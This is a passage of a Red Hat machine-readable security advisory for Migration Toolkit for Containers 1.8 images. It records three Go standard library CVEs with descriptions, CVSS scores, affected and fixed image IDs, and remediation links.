"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", }, product_reference: "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", }, product_reference: "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", }, product_reference: "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, ], }, vulnerabilities: [ { cve: "CVE-2024-24790", cwe: { id: "CWE-115", name: "Misinterpretation of Input", }, discovery_date: "2024-06-17T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2292787", }, ], notes: [ { category: "description", text: "A flaw was found in the Go language standard library net/netip. The method Is*() (IsPrivate(), IsPublic(), etc) doesn't behave properly when working with IPv6 mapped to IPv4 addresses. The unexpected behavior can lead to integrity and confidentiality issues, specifically when these methods are used to control access to resources or data.", title: "Vulnerability description", }, { category: "summary", text: "golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses", title: "Vulnerability summary", }, { category: "other", text: "This CVE has been marked as moderate as for our products a network-based attack vector is simply impossible when it comes to golang code,apart from that as per CVE flaw analysis reported by golang, this only affects integrity and confidentiality and has no effect on availability, hence CVSS has been marked as such.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-24790", }, { category: "external", summary: "RHBZ#2292787", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2292787", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-24790", url: "https://www.cve.org/CVERecord?id=CVE-2024-24790", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-24790", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-24790", }, ], release_date: "2024-06-04T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "LOCAL", availabilityImpact: "NONE", baseScore: 6.7, baseSeverity: "MEDIUM", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses", }, { cve: "CVE-2024-24791", cwe: { id: "CWE-20", name: "Improper Input Validation", }, discovery_date: "2024-07-02T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2295310", }, ], notes: [ { category: "description", text: "A flaw was found in Go. The net/http module mishandles specific server responses from HTTP/1.1 client requests. This issue may render a connection invalid and cause a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "net/http: Denial of service due to improper 100-continue handling in net/http", title: "Vulnerability summary", }, { category: "other", text: "An attacker would need to control a malicious server and induce a client to connect to it, requiring some amount of preparation outside of the attacker's control. This reduces the severity score of this flaw to Moderate.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-24791", }, { category: "external", summary: "RHBZ#2295310", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2295310", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-24791", url: "https://www.cve.org/CVERecord?id=CVE-2024-24791", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-24791", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-24791", }, { category: "external", summary: "https://go.dev/cl/591255", url: "https://go.dev/cl/591255", }, { category: "external", summary: "https://go.dev/issue/67555", url: "https://go.dev/issue/67555", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/t0rK-qHBqzY/m/6MMoAZkMAgAJ", url: "https://groups.google.com/g/golang-dev/c/t0rK-qHBqzY/m/6MMoAZkMAgAJ", }, ], release_date: "2024-07-02T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "net/http: Denial of service due to improper 100-continue handling in net/http", }, { cve: "CVE-2024-34155", cwe: { id: "CWE-674", name: "Uncontrolled Recursion", }, discovery_date: "2024-09-06T21:20:06.929766+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310527", }, ], notes: [ { category: "description", text: "A flaw was found in the go/parser package of the Golang standard library. Calling any Parse functions on Go source code containing deeply nested literals can cause a panic due to stack exhaustion.", title: "Vulnerability description", }, { category: "summary", text: "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-34155", }, { category: "external", summary: "RHBZ#2310527", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310527", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-34155", url: "https://www.cve.org/CVERecord?id=CVE-2024-34155", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-34155", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-34155", }, { category: "external", summary: "https://go.dev/cl/611238", url: "https://go.dev/cl/611238", }, { category: "external", summary: "https://go.dev/issue/69138", url: "https://go.dev/issue/69138", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", url: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-3105", url: "https://pkg.go.dev/vuln/GO-2024-3105", }, ], release_date: "2024-09-06T21:15:11.947000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", 